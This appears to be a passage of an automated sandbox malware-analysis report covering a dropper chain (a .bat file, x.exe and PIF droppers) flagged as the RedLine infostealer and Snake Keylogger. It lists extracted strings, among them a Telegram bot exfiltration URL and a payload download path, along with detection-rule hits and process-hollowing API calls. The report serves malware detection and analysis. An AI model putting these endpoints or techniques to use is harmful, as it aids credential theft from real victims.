                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020B12000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2445124760.000000007EB4A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2444599490.0000000021D51000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0$
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2558666717.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000E.00000002.2654422100.0000000007C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020B12000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2445124760.000000007EB4A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2529595198.0000000021DFB000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2444599490.0000000021D51000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000002.2779535012.0000000002662000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com0
                      Source: powershell.exe, 0000000E.00000002.2558666717.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000006.00000002.2450193992.00000000005B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/
                      Source: x.exe, 00000006.00000002.2508181748.0000000020B7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200
                      Source: x.exe, 00000006.00000002.2508181748.0000000020B7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                      Source: x.exe, 00000006.00000002.2450193992.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com:443/wps/200_Oupzhkprnvw
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.1d
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49813 version: TLS 1.2

                      System Summary

Source: 10.1.rpkhzpuO.pif.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 24.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 24.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.1.rpkhzpuO.pif.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 29.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 29.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 29.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 29.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001D.00000001.2760141830.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File dump: apihost.exe.12.dr 665670656
Source: PO#3_RKG367.bat | Static file information: 2158506
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C48254 NtReadVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C484C4 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C4DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C4DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C4DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C48BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C479B4 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C47D00 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C48BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C4D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C479B2 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BA8254 NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BA84C4 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BADACC NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BADA44 NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BA8BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BADBB0 NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BA79B4 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BA7D00 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BA8BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BA79B2 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02BAD9F0 NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DC8254 NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DC84C4 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DCDACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DCDA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DC8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DCDBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DC79B4 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DC7D00 NtWriteVirtualMemory
